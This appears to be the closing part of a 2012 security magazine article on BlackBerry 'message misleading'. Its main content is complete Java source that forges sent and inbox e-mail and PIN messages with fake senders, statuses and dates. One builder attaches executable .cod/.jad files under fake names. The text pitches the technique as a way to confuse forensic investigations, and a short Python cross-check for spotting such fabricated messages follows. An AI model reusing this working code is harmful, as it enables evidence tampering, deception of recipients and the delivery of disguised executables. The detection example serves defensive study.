import net.rim.device.api.ui.component.TextField;
import net.rim.device.api.ui.container.MainScreen;

public final class BlackBerryMisLeadScreen extends MainScreen implements FieldChangeListener
{
    TextField tf;                 // recipient address or PIN typed by the tester
    ButtonField checkoButton;     // build an outgoing (Sent) e-mail
    ButtonField checkiButton;     // build an incoming (Inbox) e-mail
    ButtonField checkiaButton;    // build an incoming e-mail with attachments
    ButtonField checkpoButton;    // build a sent PIN message
    ButtonField checkpiButton;    // build a received PIN message

    public BlackBerryMisLeadScreen()
    {
        setTitle("BlackBerry Message Misleading");
        tf = new TextField();
        tf.setLabel("Address / PIN: ");
        add(tf);
        checkoButton = makeButton("Sent e-mail");
        checkiButton = makeButton("Inbox e-mail");
        checkiaButton = makeButton("Inbox e-mail with attachment");
        checkpoButton = makeButton("Sent PIN");
        checkpiButton = makeButton("Inbox PIN");
    }

    private ButtonField makeButton(String label)
    {
        ButtonField b = new ButtonField(ButtonField.CONSUME_CLICK);
        b.setLabel(label);
        b.setChangeListener(this);
        add(b);
        return b;
    }

    public void fieldChanged(Field field, int context)
    {
        if (field == checkoButton)            // EMAIL MESSAGE BUILDER (SENT FOLDER)
        {
            String res = "";
            String omessage = "^_^";          // MESSAGE BODY
            boolean odelivered = true;        // false gives the message TX_ERROR status instead of TX_SENT
            Address oaddress = null;
            try
            {
                if (tf.getText().length() > 0)
                    oaddress = new Address(tf.getText(), "trololo friend");    // SET A NEW RECIPIENT from textfield
                else
                    oaddress = new Address("fake@ololo.com", "trololo friend");
                res += MisLeadSentMessage(oaddress, omessage, odelivered);
            }
            catch (AddressException e) { res += e.getMessage(); }
            Dialog.alert("Result for you :: " + res);
        }
        else if (field == checkiButton)       // EMAIL MESSAGE BUILDER (INBOX FOLDER)
        {
            String res = "";
            String imessage = "^_^";          // MESSAGE BODY
            Address iaddress = null;
            try
            {
                iaddress = new Address("fake@ololo.com", "trololo friend");    // SENDER ADDRESS
                res += MisLeadInboxMessage(iaddress, imessage);
            }
            catch (AddressException e) { res += e.getMessage(); }
            Dialog.alert("Result for you :: " + res);
        }
        else if (field == checkiaButton)      // EMAIL MESSAGE BUILDER (INBOX FOLDER, WITH ATTACHMENT)
        {
            String res = "";
            String imessage = "^_^";          // MESSAGE BODY
            Address iaddress = null;
            try
            {
                iaddress = new Address("fake@ololo.com", "trololo friend");    // SENDER ADDRESS
                res += MisLeadInboxMessageAttach(iaddress, imessage);
            }
            catch (AddressException e) { res += e.getMessage(); }
            Dialog.alert("Result for you :: " + res);
        }
        else if (field == checkpoButton)      // PIN MESSAGE BUILDER (SENT): GET RECIPIENT PIN from textfield
        {
            if (tf.getText().length() > 0)
                Dialog.alert(MisLeadSentPIN(tf.getText()));
        }
        else if (field == checkpiButton)      // PIN MESSAGE BUILDER (INBOX): GET SENDER PIN from textfield
        {
            if (tf.getText().length() > 0)
                Dialog.alert(MisLeadInboxPIN(tf.getText()));
        }
    }

    // BUILDER OF SENT EMAIL MESSAGE
    static String MisLeadSentMessage(Address oaddress, String message, boolean delivered)
    {
        String error_message = "";
        Store store = Session.getDefaultInstance().getStore();
        Folder[] folders = store.list(Folder.SENT);          // RETRIEVE A SENT FOLDER
        Folder sentfolder = folders[0];
        Message msg = new Message(sentfolder);               // CREATE A NEW MESSAGE IN SENT FOLDER
        if (delivered)                                       // CHECK DELIVERY STATUS
        {
            msg.setStatus(Message.Status.TX_SENT, Message.Status.TX_SENT);
        }
        else
        {
            msg.setStatus(Message.Status.TX_ERROR, Message.Status.TX_ERROR);
        }
        msg.setFlag(Message.Flag.OPENED, true);              // SET READ STATUS
        try
        {
            msg.addRecipient(Message.RecipientType.TO, oaddress);   // ADD RECIPIENT
            msg.setSubject("subject");                       // ADD SUBJECT
            msg.setContent(message);                         // ADD BODY
            msg.setSentDate(new Date(System.currentTimeMillis()));  // ADD NEW TIME
            sentfolder.appendMessage(msg);                   // ADD NEW EMAIL MESSAGE TO SENT FOLDER
        }
        catch (MessagingException e) { error_message += e.getMessage(); }
        if (error_message.length() < 1) { error_message = "no_error"; }
        return error_message;
    }

    // BUILDER OF RECEIVED EMAIL MESSAGE WITHOUT ATTACHMENT
    static String MisLeadInboxMessage(Address fromAddress, String message)
    {
        String error_message = "";
        Session session = null;
        try
        {
            session = Session.waitForDefaultSession();
        }
        catch (NoSuchServiceException e)
        {
            return e.getMessage();                           // no mail service configured
        }
        Store store = session.getStore();
        Folder[] folders = store.list(Folder.INBOX);         // RETRIEVE AN INBOX FOLDER
        Folder inbox = folders[0];
        final Message msg = new Message(inbox);              // CREATE A NEW MESSAGE IN INBOX FOLDER
        try
        {
            msg.setFrom(fromAddress);                        // ADD A SENDER
            msg.setStatus(Message.Status.RX_RECEIVED, Message.Status.RX_RECEIVED);  // ADD A RECEIVED STATUS
            msg.setSentDate(new Date(System.currentTimeMillis()));  // ADD DATE'n'TIME
            msg.setFlag(Message.Flag.REPLY_ALLOWED, true);
            msg.setInbound(true);
            msg.setSubject("subject");                       // ADD A SUBJECT TO EMAIL MESSAGE
            msg.setContent(message);                         // ADD BODY
            inbox.appendMessage(msg);                        // ADD EMAIL MESSAGE TO THE INBOX FOLDER
        }
        catch (MessagingException e) { error_message += e.getMessage(); }
        if (error_message.length() < 1) { error_message = "no_error"; }
        return error_message;
    }

    // BUILDER OF RECEIVED PIN MESSAGE
    static String MisLeadInboxPIN(String FakePIN)
    {
        String err = "";
        Store store = Session.getDefaultInstance().getStore();
        Folder[] folders = store.list(Folder.INBOX);         // RETRIEVE A PIN INBOX FOLDER
        Folder inboxfolder = folders[0];
        Message msg = new Message(inboxfolder);              // CREATE A PIN MESSAGE IN THE INBOX FOLDER
        PINAddress recipients[] = new PINAddress[1];
        try
        {
            recipients[0] = new PINAddress(FakePIN, "Robert");      // ADD RECIPIENT BY PIN and NAME
            msg.addRecipients(Message.RecipientType.TO, recipients); // ADD RECIPIENTS TO PIN STRUCTURE
            msg.setSubject("SUBJ");                          // ADD A SUBJECT
            msg.setContent("BODY");                          // ADD A BODY
            msg.setStatus(Message.Status.RX_RECEIVED, Message.Status.RX_RECEIVED);  // ADD A RECEIVED STATUS
            inboxfolder.appendMessage(msg);                  // PUT MESSAGE INTO INBOX FOLDER
        }
        catch (Exception e) { err += e.getMessage(); }
        return err;
    }

    // BUILDER OF SENT PIN MESSAGE
    static String MisLeadSentPIN(String FakePIN)
    {
        String err = "";
        Store store = Session.getDefaultInstance().getStore();
        Folder[] folders = store.list(Folder.SENT);          // RETRIEVE A PIN SENT FOLDER
        Folder sentfolder = folders[0];
        Message msg = new Message(sentfolder);               // CREATE A PIN MESSAGE IN THE SENT FOLDER
        PINAddress recipients[] = new PINAddress[1];
        try
        {
            recipients[0] = new PINAddress(FakePIN, "Robert");      // ADD RECIPIENT BY PIN and NAME
            msg.addRecipients(Message.RecipientType.TO, recipients); // ADD RECIPIENTS TO PIN STRUCTURE
            msg.setSubject("SUBJ");                          // ADD A SUBJECT
            msg.setContent("BODY");                          // ADD A BODY
            msg.setStatus(Message.Status.TX_SENT, Message.Status.TX_SENT);  // ADD A SENT STATUS
            sentfolder.appendMessage(msg);                   // PUT MESSAGE INTO SENT FOLDER
        }
        catch (Exception e) { err += e.getMessage(); }
        return err;
    }

    // BUILDER OF RECEIVED EMAIL MESSAGE WITH ATTACHMENT
    static String MisLeadInboxMessageAttach(Address fromAddress, String message)
    {
        String error_message = "";
        Session session = null;
        try
        {
            session = Session.waitForDefaultSession();
        }
        catch (NoSuchServiceException e)
        {
            return e.getMessage();                           // no mail service configured
        }
        Store store = session.getStore();
        Folder[] folders = store.list(Folder.INBOX);         // RETRIEVE AN INBOX FOLDER
        Folder inbox = folders[0];
        final Message msg = new Message(inbox);              // CREATE A NEW MESSAGE IN INBOX FOLDER

        // SET PATH OF EXECUTION FILE: a .cod/.jad pair delivered as fake attachments
        String fullname1 = "file:///SDCard/bin/BlackBerryKit_1.cod";
        String fullname2 = "file:///SDCard/bin/BlackBerryKit_1.jad";
        Multipart multipart = new Multipart();
        SupportedAttachmentPart attach = null;
        String mtype = "";
        byte[] data = null;
        try
        {
            multipart.addBodyPart(new TextBodyPart(multipart, message));   // MESSAGE BODY
            data = readFile(fullname1);                      // CALL YOUR OWN READ METHOD TO GET ATTACHMENT DATA
            mtype = MIMETypeAssociations.getMIMEType(fullname1);   // ADD ATTACHMENT WITH CORRECT FILE TYPE
            attach = new SupportedAttachmentPart(multipart, mtype, "filename-$$", data);   // ADD A FAKE ATTACHMENT NAME
            multipart.addBodyPart(attach);
            data = readFile(fullname2);
            mtype = MIMETypeAssociations.getMIMEType(fullname2);
            attach = new SupportedAttachmentPart(multipart, mtype, "filename-$$$", data);  // ADD A FAKE ATTACHMENT NAME
            multipart.addBodyPart(attach);
        }
        catch (Exception e) { error_message += e.getMessage(); }
        try
        {
            msg.setFrom(fromAddress);                        // ADD A SENDER
            msg.setStatus(Message.Status.RX_RECEIVED, Message.Status.RX_RECEIVED);  // ADD A RECEIVED STATUS
            msg.setSentDate(new Date(System.currentTimeMillis()));  // ADD DATE'n'TIME
            msg.setFlag(Message.Flag.REPLY_ALLOWED, true);
            msg.setInbound(true);
            msg.setSubject("subject");                       // ADD A SUBJECT TO EMAIL MESSAGE
            msg.setContent(multipart);                       // ADD THE FAKE ATTACHMENTS
            inbox.appendMessage(msg);                        // PUT AN EMAIL MESSAGE WITH ATTACHMENT INTO INBOX
        }
        catch (MessagingException e) { error_message += e.getMessage(); }
        if (error_message.length() < 1) { error_message = "no_error"; }
        return error_message;
    }

    // Read a whole file from the file system into memory
    public static byte[] readFile(String FullName)
    {
        byte[] data = null;
        FileConnection fconn = null;
        DataInputStream is = null;
        try
        {
            fconn = (FileConnection) Connector.open(FullName, Connector.READ);
            is = fconn.openDataInputStream();
            data = IOUtilities.streamToBytes(is);
        }
        catch (IOException e) { Dialog.alert(e.getMessage()); }
        finally
        {
            try
            {
                if (null != is) is.close();
                if (null != fconn) fconn.close();
            }
            catch (IOException e) { Dialog.alert(e.getMessage()); }
        }
        return data;
    }
}

Conclusion
These two articles describe how anyone could easily develop malware, or a security application, that works with such vulnerabilities. The points highlighted here are very topical, because some of them take advantage of old security issues and concepts from DOS, UNIX and other OSs.
Yury Chemerkin
Graduated from the Russian State University for the Humanities (http://rggu.com/) in 2010. At present a postgraduate at RSUH. Information security researcher since 2009; currently works as a mobile and social information security researcher in Moscow. Experienced in reverse engineering, software programming, cyber and mobile security research, documentation, and security writing as a regular contributor. Now researching cloud security and social privacy.
Contacts: I have a lot of social contacts, so you are able to choose the way most suitable for you.
Regular blog: http://security-through-obscurity.blogspot.com
Regular Email: yury.chemerkin@gmail.com
Skype: yury.chemerkin
My other contacts (blogs, IM, social networks) can be found among the http links and social icons before the TimeLine section on Re.Vu: http://re.vu/yury.chemerkin

The last exploitation
The last exploitation covers so-called message misleading, discussed in one of my previous articles. I recall some ideas and present code that attempts to cover all entry points and can easily be adapted for testing. The RIM API is able to create PIN and e-mail messages with any possible parameters: their type (incoming, outgoing, received, sent, draft, etc.) and their status (read, unread, error while sending, etc.). You may set your own date, list of recipients, subject, body and attachments. Note that not one of these messages will synchronize with your real e-
What are the goals you gain by implementing these ideas? Maybe you would like to build steganography, maybe you have to make a lot of fake messages with fake interaction graphs to perplex a forensic investigation, or maybe something else; it is all up to you (Figure 22-Figure 25).

Figure 22. Sent Email Message
Figure 23. Received Email Message with attachment
Figure 24. PIN-to-PIN Message with Error Status
Figure 25. PIN-to-PIN Message with Sent Status
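The point that fabricated messages never synchronize with the real mailbox cuts both ways: an investigator who has both the device-side message store and the server-side mailbox can use exactly that property to flag them. The following added example (not code from the article) does the cross-check with normalised addresses and subjects and a clock tolerance, since device and server timestamps rarely agree to the second. The records are constructed; the field names and the five-minute tolerance are assumptions. PIN-to-PIN messages never touch the mail server, so this check does not cover them.

```python
"""Flag device-side e-mail with no counterpart in the real mailbox (added example)."""
from datetime import datetime, timedelta

# Constructed records: a forensic export of the device's Messages store and a
# server-side listing of the same mailbox. Field names are assumptions.
DEVICE = [
    {"folder": "Inbox", "peer": "Boss@Example.com", "subject": "Q1 numbers",
     "date": "2012-03-19 09:00:40"},
    {"folder": "Inbox", "peer": "fake@ololo.com", "subject": "subject",
     "date": "2012-03-19 10:15:00"},
    {"folder": "Sent", "peer": "boss@example.com", "subject": "Re: Q1  numbers",
     "date": "2012-03-19 09:12:05"},
    {"folder": "Sent", "peer": "fake@ololo.com", "subject": "subject",
     "date": "2012-03-19 10:20:00"},
]
SERVER = [
    {"folder": "INBOX", "peer": "boss@example.com", "subject": "Q1 numbers",
     "date": "2012-03-19 09:00:00"},
    {"folder": "Sent", "peer": "boss@example.com", "subject": "Re: Q1 numbers",
     "date": "2012-03-19 09:12:00"},
]

CLOCK_TOLERANCE = timedelta(minutes=5)   # device and server clocks are rarely identical


def parse_dt(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def key(rec):
    """Normalised (folder, peer, subject): case and whitespace must not split a match."""
    return (rec["folder"].lower(),
            rec["peer"].strip().lower(),
            " ".join(rec["subject"].split()).lower())


def same_message(dev, srv):
    return (key(dev) == key(srv) and
            abs(parse_dt(dev["date"]) - parse_dt(srv["date"])) <= CLOCK_TOLERANCE)


def unsynchronized(device, server):
    """Device messages with no server counterpart: candidates for locally fabricated mail."""
    return [d for d in device if not any(same_message(d, s) for s in server)]


if __name__ == "__main__":
    for d in unsynchronized(DEVICE, SERVER):
        print("device-only:", d["folder"], d["peer"], d["subject"], d["date"])
```

A message that exists only on the device is not proof of fabrication (it may simply have been deleted server-side), but it is the first thing to pull for closer inspection of its headers and status flags.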
On the Net
• http://forum.drweb.com/index.php?showtopic=302926 – New Trojan horse for Android spreads with Angry Birds Rio Unlock, Dr.Web
• http://www.csc.ncsu.edu/faculty/jiang/DroidKungFu.html, http://www.csc.ncsu.edu/faculty/jiang/DroidKungFu2/ – Research on DroidKungFu variants, Xuxian Jiang, Assistant Professor, Department of Computer Science, NC State University
• http://blog.mylookout.com/blog/2011/01/07/geinimi-trojan-technical-analysis/ – Geinimi Trojan Technical Analysis
• http://www.informationweek.com/news/security/mobile/231001685 – Zitmo Banking Trojan
• http://www.computerworld.com/s/article/9210764/New_bank_Trojan_employs_fresh_tricks_to_steal_account_data – OddJob bank trojan
• http://www.elcomsoft.com/ebbe.html – Elcomsoft BlackBerry Backup Explorer

www.hakin9.org/en 04/2012